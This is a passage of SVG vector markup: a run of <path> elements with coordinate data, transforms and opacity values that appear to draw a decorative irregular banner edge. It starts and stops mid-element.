0.37-.87a5.91,5.91,0,0,0,2.61,0c2.11-.17,4.22-.49,6.33-.54,4-.08,8.08,0,12.12,0,7.89.08,15.79.14,23.68.32,6.09.13,12.19.29,18.27.68,7,.45,13.91,1.25,20.88,1.76,2.92.21,5.87,0,8.8.06a13.19,13.19,0,0,1,4,.24c6.31,2.22,12.79,2,19.37,2.17,10.34.27,20.68,1.3,31,2.58,3,.37,6.89-12.55,9.18-11,1.32.89,12.9,3.57,12.9,3.57s.31-8.06,15.63-1.73c.66.27,10.09-4.48,10.79-4.37.44.14,1.15,2.47,1.58,2.61,1.42.17.69-7.18,2.11-7.2,16.22-.26,15.65.29,15.23.43l4.25-1.2s8.6-5.21,12.58-5.19a7.81,7.81,0,0,1,.94-1.51,4.11,4.11,0,0,0,.46.94c.33.5,2,.15,3,.14l.12,0c2,3.77,3.14,11,3.63,4,.07-1.21.31-3.35.7-6.28,3-.77,6.13-.13,9.28.62a7.88,7.88,0,0,1,2.6.64,4.88,4.88,0,0,1,2,2.31,60.15,60.15,0,0,1,1.34,6.22c4.32-1.57,8-2,12.06-.48,2.13.78,4.92-.48,7.38-.33s4.66.92,7.54,1.54c.72-1,1.81-2.64,2.82-4.13l4.43,3.18,0,0c.25-.81.51-1.61.76-2.42,1.93.71,3.59,1.21,5.14,1.92a4.61,4.61,0,0,0,5-.26c.59-.41,2-.08,2.78.29,3.84,1.71,7.59,2.6,11.47.11a2.26,2.26,0,0,1,1.89.12c4.53,2.45,9.29,2.22,14.13,1.42a3.25,3.25,0,0,1,1.64.14c5.87,2.35,11.49.87,17.18-.85a11.57,11.57,0,0,1,5-.06c2.39.4,4.72,1.66,7.09,1.67,3.16,0,4.21,1.44,4.1,4.6,1.12-2,1.7-4,3-5.11s3.43-2,5,.87c-1.25,1.36-2.58,2.81-4.34,4.75l5.16.85c2.4-4.06,3.67-4.4,8.55-3.34,1.08.24,2.49-.73,3.68-1.29,1-.47,2.23-1.88,2.76-1.63,3.59,1.73,8.2,1.09,11,4.73.5.64,1.75.76,2.69,1,1.16.26,2.36.37,3.54.54l1.73-1c.19-.27.45-.8.55-.77,2.78.8,4.73-.29,6.38-2.48a3.27,3.27,0,0,1,2.34.91c1.38,2,2.94,2.06,5.24,1.75,3.19-.43,6.51.16,9.76,0,2.6-.09,5.18-.8,7.78-.85a38,38,0,0,1,9.55.55c2.58.62,4.75,1.12,7.47.28,2.24-.69,4.92,0,7.4.15,2.91-1.39,5.85-2.73,8.73-4.18,2.7-1.37,5.19-3.5,8.64-1.62.21-3.15,2.3-3.62,4.6-3.8,5-.54,10-1.12,15-1.55.75-.07,1.56.56,2.34.86l1.19.25c4.38-1.37,5.63-1,8.1,2.84,1.7,2.64,4.23,3.13,7,3.14,5,0,5.52.61,4.39,5.07-.7,2.76.68,4.28,3.32,3.67,3.21-.74,4,.15,5,5.53a9.44,9.44,0,0,0,2.19-.11c4-1.13,4.94-.62,6.42,3.34.38,1,.92,2,1.39,3a28.51,28.51,0,0,1,15.36,3.26,26.81,26.81,0,0,0,7,3c1,.21,2.45-1.48,3.7-2.3-.13-.31-.25-.63-.38-.94,1.71.44,3.42.86,5.13,1.31,2.25.58,4.25,1.89,6.69-.37,1.57-1.45,3.87-.37,5.21,1.56a.38.38,0,0,1,.25.27c2.24,1.52,7.57,1.76,9.59.42,2.33-1.55,3.63-.44,4.84,1.62,1.83,3.13,3.85,6.14,5.79,9.2l.67.18,2.77-.67h0c.6-1.35.88-3.39,1.88-3.84s2.62.88,4,1.37c1.18.43,2.38.8,3.57,1.19l.72-.74c-.37-1.73-.75-3.47-1.12-5.2l.63-.64c1.89,1.52,3.79,3,5.9,4.71l1-3.54,5,5.65c.67-2.08,1-3.29,1.59-5l7.26,7.64,4.83-3.54c.84,1.18,1.84,2.57,2.4,3.34,2-.65,3.7-1.25,5.41-1.7,2.5-.66,5-1.2,7.54-1.8l1.31-.91c0-.48.11-1,.23-2l1.08,1.71.76.53a15.34,15.34,0,0,0,9.54,4.36l1.86-1c.08-1.19.16-2.38.29-4.23,2.22,1.5,3.32,5.15,6.44,2.81L1815,92c2.37-1,4.78-1.88,7.06-3a13.68,13.68,0,0,0,2.71-2.53c.27.13.93.26,1,.53,1,4.54,5.54,4.74,8.52,6.81a2.14,2.14,0,0,0,2.07-.29c1.54-2.23,3.15-1.64,4.89-.42l1.45.44,8,.57.95-1.13c2.4,1.21,4.47,4.12,7.25.82.12-.15,1,.49,1.46.44,2.68-.26,5.39.31,7.94-1.61,1.18-.89,3.71-.85,5.22-.23,2.13.87,3.88,2.66,6,4.25,2.45-2.2,5.24-3,8.11-.22a1.27,1.27,0,0,0,.94.32c7.53-1.47,11.48,4,16.11,8.24l1.19.76.25.16c2.4-.85,4.72-2.61,7.11-3.61a16.85,16.85,0,0,0,5.31-.39,7.17,7.17,0,0,1,1.47.73V0H0V61.35C7.17,64.37,14.69,67.61,13.9,65.4Z\"\n          transform=\"translate(0 0)\"></path>\n        <path d=\"M578.73,49.78c-.71.36-1.4.75-2.11,1.12C577.33,50.53,578,50.14,578.73,49.78Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1346.24,53l-.13,0Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1366.87,57.76c-.79-.16-1.57-.35-2.35-.56q-.45,1.17-1,2.37a11.27,11.27,0,0,1,3.33,2.15A5.14,5.14,0,0,1,1366.87,57.76Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1358.64,55.7c-2.72-.47-5.42-1.38-8.11-2.09a20.91,20.91,0,0,0-5.31,1.38l-2.37-2.32a49.11,49.11,0,0,1-9.39-.28c-1.41-.22-2.83-.34-4.24-.51.42.31.8.8,1.27.91,4.07,1,7.9,2.53,12.35,2.59,4.94.07,9.84,2,14.78,3.07,1.64.35,3.48.1,5,.73l.74.33c-.23-.94-.46-1.88-.7-2.84A37.55,37.55,0,0,0,1358.64,55.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1048.36,50.39a132.31,132.31,0,0,1-17.87,1.43c-8-.06-16-.76-23.94-1.35-6.42-.48-12.86-.91-19.21-1.87s-12.83,2.07-19-1.37c-2.08-1.15-4.82-1-7.19-1.72-5.73-1.65-11.41-3.46-17.13-5.15-4.34-1.28-8.72-2.44-13.07-3.7q-10.73-3.1-21.41-6.26c0,.49.11,1,.17,1.49l.15.16,4.5,2.05c8.53-.06,15.79,4.83,23.95,6.26a9.88,9.88,0,0,1,2.6,1.37l2.1.53c2.58.87,5.12,1.93,7.75,2.59,4.42,1.1,9,1.64,13.34,3,3.34,1.06,6.4,3,9.58,4.56l1.92.11c1.35-1.93,2.77-3.19,4.72-.6.24.31,1,.67,1.14.54,4.17-3,8.46,1.9,12.67-.18.41-.2,1.27.58,1.94.85s1.3.73,1.71.55c6.17-2.8,12-1.76,17.88,1.09,1.64.8,3.9.31,5.58,1,3.35,1.49,5.58.32,8.39-1.6,1.63-1.11,4.73-.09,7.16,0,.88,0,2,.42,2.58,0,3.47-2.14,7.39-1.74,11.14-2.29,2-1,5-.17,5.46-3.49l-2.17-.72C1052,48.66,1050.24,50.15,1048.36,50.39Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M593.88,22.35a11,11,0,0,0-2.19,4c-.27,1.18.34,2.56,0,4.16-.47-.63-1.3-1.23-1.35-1.89-.15-2.13-.47-3.36-3.23-2.79-.81.16-2.08-1.93-3-2.08l-13.75,3.14c.09,1.25.18,2.5.31,4.21l3.47-2.63c-.11,2.12-.16,3.26-.22,4.4.86,1.09,1.77,3.13,2.55,3.08,2.1-.13,4.13-1.17,6.19-1.84a7.84,7.84,0,0,1,2.46-.46c.81.12,2,1.24,2.25,1,2.3-2,4.45-1.47,7.06-.56,1.14.4,3.79-.72,4.26-1.8,1-2.32,2.63-2.12,4.42-2.16a35,35,0,0,1,4.6,4.14c2.27,2.9,4,3.48,6.9,1.64l2.9-2.16a28,28,0,0,0-4.47-.2c-2.5.27-3.81-.73-4.28-3.14-1.15-5.81-3.88-6.79-8.81-6.51-1.31.07-2.66-.83-4-1.23C595.25,22.46,594.08,22.08,593.88,22.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M840.13,15.47a34.57,34.57,0,0,0-5.42-2.36,79.56,79.56,0,0,0-9-1.52c-17.69-2.24-35.35-5-53.11-6.47-15.17-1.27-30.47-1.2-45.71-1.52-3.82-.08-8-1.2-11.32,2a1,1,0,0,1-1,.09c-2.93-3-5.59-.7-8.32.37-4.62.08-9.25.13-13.88.27a15.85,15.85,0,0,0-2.84.56,20,20,0,0,0,3.75.77c5.35.11,10.71.08,16.06.09L714.1,7c1.65.72,3.2,1.14,4.27-1a1.85,1.85,0,0,1,1.26-1c3.61.13,7.22.38,10.83.6l4,0,7.61.72,1.29-.11c1.7,0,3.4,0,5.09.17,1.53.15,3.28,1.13,4.53.66,7-2.64,14.1-.47,21.12-.67,4.07-.12,8.2,1.38,12.27,2.29.76.16,1.39.94,2.08,1.44h1.74c2.16-2.4,4.22-1.09,6.28.17l4-.62c5.66.68,11.33,1.34,17,2.05a5.11,5.11,0,0,1,1.43.7l4,0,2.16,1.18c2.65.24,5.3.69,8,.67a4.6,4.6,0,0,1,4.76,2.91,3.36,3.36,0,0,0,2,1c1.77-2.47,4.07-1.38,6.33-1.25,1.11.07,2.27-.75,3.4-1.17C846.24,15.49,842.76,11.56,840.13,15.47Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M377.36,57.38l3.48,3.7c2.16,0,4.31,0,6.46.1,2.56.18,5,1.74,7.54,2.67h.23q2-1.53,4-3.08a4.77,4.77,0,0,1-1.22,3.11c2.16-.47,4.32-.93,6.46-1.45a5.59,5.59,0,0,0,1.37-.82c-1.83-.71-3.62-1.86-5.51-2.06C392.6,58.76,385,58,377.36,57.38Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M368.88,56.73c-5.39-.38-10.86.29-16.23-.24-3.07-.31-5.38-.62-6.24,3-8.56-4.77-9.34-4.7-13.17,1.16,4.62-3.58,8.55-2.1,12.23,1.59.35.35,1,.36,1.58.52a20.12,20.12,0,0,0,3.44-1.34c3.29-2,6.73-3.32,10.6-2.59s7.48,1.71,11.22,2.57c2.84-.06,5.69-.22,8.53-.29l-3.48-3.7Q373.13,57,368.88,56.73Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M615.28,43.58a6.49,6.49,0,0,1-3.64.67c-2.37-.09-4.73-.22-7.1-.34-2,1.84-4.12,2.37-5.53,1.37l-1.27-.4c-3.89,2.68-8.45,3.06-11,.9L580,49.12l6.27,2.67c3.06-1.3,6.64-2.9,10.31-4.27.66-.25,1.68.48,2.54.77l1.28,0c2.18-2.06,4.28-1.29,6.42.13a4.86,4.86,0,0,0,2.56,1.08c3.71-.3,7.4-.81,11.1-1.31.21,0,.35-.54.52-.82-.26-.29-.53-.57-.79-.85Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M507.12,48c-.67.39-1.39,1.18-2,1.11-3.18-.35-6.35-.9-9.5-1.46-.31-.06-.52-.64-.78-1h-1.36l-6.75-.09H484l-10.48,2.29,0,1.24c5.62.81,11.31,2.46,16.85,2.09,3-.2,5.47-.82,8,1.06.6-3.51,1.47-3.82,4.77-3.15,2.15.43,4.49-.12,6.75-.24L508.44,48Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M850.88,16.19l5.58,2.33q15.19,3.06,30.4,6.12a22,22,0,0,1,2.23.68l2.07.77,5.43,3.21a17.66,17.66,0,0,1,4.35-.07,48.5,48.5,0,0,1,5.84,2.1l1.39-1.16c-3.15-1-6.25-2.3-9.46-3.05C882.78,23.41,866.82,19.82,850.88,16.19Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M576.37,50.06c-3.79.19-7.58.34-11.36.5l-1.29.43c-.05.49-.11,1-.16,1.47l.86.35,1.25-.23h.72l2.67.39a48.3,48.3,0,0,0,5.4-1.12,31.65,31.65,0,0,0,4.27-2.07l-2.08-.28C576.55,49.69,576.47,50.06,576.37,50.06Z\" transform=\"translate(0 0)\"\n          opacity=\"0.3\"></path>\n        <path d=\"M1059.41,43.77l-.77.61c-.24,1.13-.47,2.26-.71,3.39a18.41,18.41,0,0,1,2.82-2.05c.93-.45,2.43-1.08,3-.67,2.79,1.93,4.23.19,5.75-1.68a22.42,22.42,0,0,0-4.62-.68A37.77,37.77,0,0,0,1059.41,43.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M486.42,71.5c-3.79-.28-7.57-.59-11.36-.88l.77,1.08,3.3.13,11,1.19.4-1-.42-.41C488.86,71.59,487.64,71.58,486.42,71.5Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M527.5,50l-2.07.62,2.17,4.4L531,51.23c-.47-.39-.94-.78-1.4-1.18Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M614.07,8.49h-2l0,1.26,2.81.44C614.57,9.62,614.32,9.05,614.07,8.49Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1321.16,59.25l-.73.86Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1320.43,60.11l-.65.75Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.18,54.36c-1.27,1.52-2.76,3.37-4,4.89C1322.42,57.73,1323.91,55.88,1325.18,54.36Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1326.56,52.74c-.21.23-.42.48-.65.75C1326.14,53.22,1326.35,53,1326.56,52.74Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1327.11,52.14c-.17.17-.35.37-.55.6C1326.76,52.51,1326.94,52.31,1327.11,52.14Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1325.91,53.49l-.73.87Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1319.78,60.86l-.55.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M490.08,71.64l.42.41.95-.4c-.2-.67-.4-1.34-.59-2Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1086,41.78l-4.89-.68C1082.87,44.39,1083.61,44.49,1086,41.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1076.57,42.78l.45-1.1-1.31.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M565.79,29.66c.06-1.93-.63-4.54,2.58-4.94-1.36-3.09-2.72-.45-3.76.19s-1.65,1.89-2.45,2.88c.21-2.7-.49-6.21,3.19-6.42,5.16-.29,9.71-4.39,15.25-2.3.42.15,1.4-1.2,2.12-1.86-3.88-.15-7.73-1.19-11.6.57-2.71,1.23-6,1.38-8.43,3-1.57,1-2.22,3.68-2.88,5.74-.33,1.07.65,2.59.25,3.58A4.58,4.58,0,0,1,557.24,32c-.34.1-1.7-1.43-1.62-2.1a49.65,49.65,0,0,1,1.49-6.3A3.94,3.94,0,0,0,554.27,25c-.57.65-.81,1.6-1.41,2.19-2.5,2.45-2.2,7.69,1.09,8.56,2.94.79,6.48.12,9.56-.67C565.92,34.5,565.73,31.88,565.79,29.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M590,17.37c2.15,1.32,4.17.62,5.05-2.05-3-.28-6-.64-9-.8-1.78-.1-3.49.23-3.33,2.69C585.19,16.1,587.47,15.79,590,17.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M523.5,50.6l-6.22-.66C519.18,51.84,521.13,53.28,523.5,50.6Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M544.57,52.59l4.79-.53-6.14-.22Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M539.19,51.31H535Q537.09,54.13,539.19,51.31Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M674.64,5.51c3.24,2.44,6.72,1.7,10.21.74C681.62,3.7,678.1,5,674.64,5.51Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M621.45,9.64l-4,.6C619,11.45,620.43,12,621.45,9.64Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M557.51,52l3.44.5C560,51.14,558.9,50.51,557.51,52Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M678,35.46l-1.27,0c-2,.15-4.63-2.1-5.91,1.06-.88,2.19-.79,4.75,1.62,5.94,1.26.62,3.1,0,4.67,0C676.91,40.05,681.62,38.29,678,35.46Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M642,34.88l-1.44,2.06,2.08,3.75c-5.91.72-7,.08-6.56-3.72q.84-2.46,1.7-4.92L642,33.53c0-1,.27-2.25-.21-3a42.76,42.76,0,0,0-3.9-4.46c-5.63,3.6-4.11,9.68-5.71,14.76,3.08.93,5.82,1.68,8.51,2.58,1.68.55,2.88.21,2.71-1.65A63.89,63.89,0,0,0,642,34.88Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M654.52,37.15c-3-1-4.73.23-5.47,3.53a46,46,0,0,0,5.11,3.74,2.69,2.69,0,0,0,2.54-.71C658,41.13,656.79,37.88,654.52,37.15Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M380.12,72.88h1.16l2.19-5.26-6.27.06Q378.67,70.29,380.12,72.88Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M395.07,63.86l-.15.12c1.42.52,2.34.41,3-.09l-.49.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1664.81,72.6c-3.76.14-6.25-1-5.79-5.51-8.24.44-12.2-4.51-14.84-10.85l-5-.11,1.38-4.74L1637.29,50l-1.19-.25-2.21,3.28c-3.28,0-6.71-.25-10.11,0-2.36.17-3.93-.55-5-2.57-2.3.18-4.39.65-4.6,3.8-3.45-1.88-5.94.25-8.64,1.62-2.88,1.45-5.82,2.79-8.73,4.18,0,3.7-3.85,4.65-5.47,7.21-.19.3-2.22-.56-4.11-1.08a5,5,0,0,1-1.9,1.28c-1.07.3-2.75.47-3.42-.14-2.52-2.26-4.74-4.86-7.28-7.57L1569.3,64c.26.79.58,1.71,1,3-4.84,0-8.94-.8-11.86-4.8-1-1.44-4.38-.65-5.42,1.28-.62,1.15-1,2.4-1.61,3.69-3.49-1.8-6.64-2.52-10.12.2l-1-6.9-1.73,1a28.62,28.62,0,0,1-.39,3.35,3,3,0,0,1-5,1.65c-3.85-3.61-4.45-3.68-8.87-1a9.11,9.11,0,0,1-1.13.48c-.07-1.6.41-3.62-.34-4.33-1-.89-2.92-.69-4.44-1a11.3,11.3,0,0,0-3-.6,4.21,4.21,0,0,0-2.82,1.14c-3,4.1-5.26,4.64-9.73,2.09a38.14,38.14,0,0,0-3.73-1.53l3.55,4.65c-3.76-.14-5.79-1.6-7.27-3.65-1.3-1.8-2.32-2.25-4.45-1.1-3.31,1.78-6.88,3.07-10.48,4.63l-1.82-2.69c-1.9.35-2.84,4-5.56,1.39.28-.32.56-.59.8-.9.67-.86,1.71-1.67,1.85-2.62.09-.57-1.27-1.93-1.92-1.9a3.45,3.45,0,0,0-2.45,1.77c-.94,2.21-2.11,3.13-4.3,1.57l-3.38,4-2.57-3.17L1458,65.6l-.72-.38c.4-1.32.81-2.64,1.36-4.43a8.88,8.88,0,0,0-1.73,1.1c-2.58,2.82-2.2,2.48-4.89-.34-1.6-1.68-4.57-2.06-7.18-3.14l-2.06,6-6.73-4.13-1.95,4.61c-3.35-1.89-1.19-4.44-1.42-6.94l-3.06,1.52c-2.06-4.1-5.47-6.59-8.27-6l0,0c0,1.45,0,2.91-.17,4.35s-.11,3.36-.89,3.8a24.34,24.34,0,0,1-7.85,3c-.84.14-2.57-2-3-3.39-.92-2.73-2.66-2.19-3.72-.87-1.66,2.07-3,3.61-5.78,1.86-.4-.25-1.47.59-3,1.26.28-3.12.52-5.88.78-8.8-3.9.23-4.2,4.76-6.84,7.06l2.77.25c-.3,2.21-.58,4.37-.9,6.79-4.36,1.6-8.33,1-12-3.82-.45,2.68-.71,4.27-1,5.86l-1.23,0-.09-5.57c-4.85-.22-5.88-1.3-7.45-7.5a10.27,10.27,0,0,0-1.53-2.56c-.86.79-2.06,1.42-2.52,2.39a.8.8,0,0,0-.07.2,17.91,17.91,0,0,0,3.35.38,31.12,31.12,0,0,1-2.69,4.41,7.22,7.22,0,0,0-.73-.83,7,7,0,0,0,2.45,3.09,4.87,4.87,0,0,1,1.22,2c.26.57.23,1.69.54,1.77,4.24,1.08,3.72,5.67,6.08,8.1a3.78,3.78,0,0,1,.28,1.17c4.9,1.81,11.61,0,7.49,7.22.93,0,1.86,1.46,2.78,1.5a1.93,1.93,0,0,0,1.31-1.52c0-.09.18-.23.25-.21,4.15.85,5.2-1.72,6-5,.1-.38,2.77-.11,5.19-.16.64-1.69,1.6-4.22,2.34-6.2,2.16-.59,4-1,5.69-1.6,2.08-.75,3.19-.5,3.27,2a2.8,2.8,0,0,0,4.42,2.37l2-1.18,1.72-1.08c.23.8.41,1.44.59,2.08l4.49-1.27c.76-3.18,4.75-6.31,7.59-5.52,1,.27,1.55,1.92,2.32,3,2.69-.45,5.41-.82,8.09-1.36,4.48-.92,9.45,2.06,13.59-1.73.22-.21.86.05,1.31.08a27.18,27.18,0,0,0,5,.23c2.43-.32,4.79-1.43,7.21-1.5,7.3-.21,14.6-.08,21.91-.07,3.35.46,6.71.91,10.06,1.38l4-.22c1.29-.37,2.7-1.28,3.85-1,3.3.72,6.47,2.06,9.62-.47a3.24,3.24,0,0,1,2.29-.3c5.84.94,11.67,1.9,17.49,3a11.89,11.89,0,0,1,2.91,1.47l1.34-.12a7.76,7.76,0,0,1,2.34-1c3.41-.24,6.83-.33,10.25-.46a.46.46,0,0,1,.33.07c5.27,4.14,11.33.27,17,2l3,5.61c2.23-3.22-.92-7.65,3.41-8.37,2.25.11,4.63-.19,6.71.47,1.82.57,4.56.94,4.14,4.18a15.57,15.57,0,0,0,.45,3.63l3.83-.53c-.31-1-1-2.12-.76-2.82.37-1,2-2.38,2.25-2.23,2.63,1.6,3-.55,4.13-3,3.4,2,6.75,3.57,9.72,5.7,2,1.42,3.35.52,5-.2,2-3.33,3.3-3.71,6.5-2.07a36,36,0,0,0,3.67,1.4c1.91-4.84,8.35-7.47,13.09-5.71a10.29,10.29,0,0,0,3.93.58c2.66-.1,4.6.16,5.78,3.26s3.55,1.73,5.58-.06c5.34,4.46,11.13,7.37,18.27,5.13-.56-1.46-1.13-2.92-1.69-4.37C1668.51,72.76,1666.65,72.53,1664.81,72.6Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a12.91,12.91,0,0,1,5.93.69c.72.26,2-.44,2.76-1a12.13,12.13,0,0,0,2-2.32c.51,2.08,1,3.92,1.4,5.67l1.88.53a13.59,13.59,0,0,0,.91-3.92,7.69,7.69,0,0,0-1.12-4.78c-3.86-5.23-3.61-8.25,1.59-12.2l-1-2.41-3.27,1.17c-1.39,3.27-4.58,2.18-7,2.88l-4.15.64-2.78,5.82c.14.88.27,1.75.41,2.62,1.78,1.32.75,2.12-.54,2.86-1.6.92-3.2,1.82-4.8,2.73l.07.06,1.06,0A24.11,24.11,0,0,1,1350.53,53.61Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1363.39,59.73l.08-.16-.13-.06Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1904.67,105c-4.63-4.2-8.58-9.71-16.11-8.24a1.27,1.27,0,0,1-.94-.32c-2.87-2.78-5.66-2-8.11.22-2.16-1.59-3.91-3.38-6-4.25-1.51-.62-4-.66-5.22.23-2.55,1.92-5.26,1.35-7.94,1.61-.49,0-1.34-.59-1.46-.44-2.78,3.3-4.85.39-7.25-.82l-.95,1.13-8-.57,1.62,1.88,1.31-.09,3.89.68a27.36,27.36,0,0,0,5.26.81c3.42-.11,6.85-.51,10.26-.92a6.53,6.53,0,0,0,2.39-1.06c2.51-1.5,4.93-.16,5.11,2.8a7.37,7.37,0,0,0,.4,1.8c3.42-.78,6.66-2.57,9.08-1.79,2.83.9,5.25.33,7.87.48,1.77.1,4.3.69,5.07,1.94C1897.6,104.32,1899.41,105.54,1904.67,105Zm-54-10.88Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1779.25,94.49c-.56-.77-1.56-2.16-2.4-3.34L1772,94.69l-7.26-7.64c-.54,1.71-.92,2.92-1.59,5l-5-5.65-1,3.54c-2.11-1.68-4-3.19-5.9-4.71l-.63.64c.37,1.73.75,3.47,1.12,5.2a6.41,6.41,0,0,1,1.94-.09c4.59,1.21,9.17,2.43,13.71,3.79a12.94,12.94,0,0,1,2.87,1.77c3-1.41,6-3.41,9,0l1.22-.18c1.74-.63,3.55-1.15,5.23-1.93,2.21-1,4.32-2.27,6.47-3.43-2.52.6-5,1.14-7.54,1.8C1783,93.24,1781.29,93.84,1779.25,94.49Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1712.48,80.52c-2.44,2.26-4.44,1-6.69.37-1.71-.45-3.42-.87-5.13-1.31l.38.94c-1.25.82-2.67,2.51-3.7,2.3a26.81,26.81,0,0,1-7-3A28.61,28.61,0,0,0,1675,76.56l-1.76.73a2.52,2.52,0,0,1,.08.55c2.37.33,4.74.68,7.12,1,.54.07,1.18-.17,1.65,0,2.47,1.08,4.91,2.26,7.36,3.4L1692,82c1.18.3,2.57.3,3.5,1,2.19,1.5,4.06,2,6.39.17,1-.73,2.92-1.24,3.82-.74,4.17,2.29,8-.62,12-.33C1716.35,80.15,1714.05,79.07,1712.48,80.52Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1899.35,115.9l0,0c.09.56.18,1.13.28,1.7,2.05-.79,4.27-.89,7.51.73,0-1.07,0-2,.05-2.8A10.94,10.94,0,0,0,1899.35,115.9Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1836.36,93.51a2.14,2.14,0,0,1-2.07.29c-3-2.07-7.49-2.27-8.52-6.81-.06-.27-.72-.4-1-.53a13.68,13.68,0,0,1-2.71,2.53c-2.28,1.15-4.69,2-7.06,3l4.21.73,1.28-.88,2.63-.37c1.11-.09,2.37-.56,3.3-.2,3,1.16,6,2.63,8.94,4l3.23-1,2.65-1.15C1839.51,91.87,1837.9,91.28,1836.36,93.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1727.53,82.77c-2,1.34-7.35,1.1-9.59-.42-.6,3.09,1.11,3.46,3.55,3.09,6-.94,11.13.12,13.86,6.49.34.8,1.84,1.12,2.81,1.66-1.94-3.06-4-6.07-5.79-9.2C1731.16,82.33,1729.86,81.22,1727.53,82.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1795.58,90.34l4.15,5.71,3.54.31,2-.34-.12-1.32A15.34,15.34,0,0,1,1795.58,90.34Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1743.5,89.25c-1,.45-1.29,2.49-1.89,3.84l3-3,4,3.33,2.54-1.61c-1.19-.39-2.39-.76-3.57-1.19C1746.11,90.13,1744.42,88.82,1743.5,89.25Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path 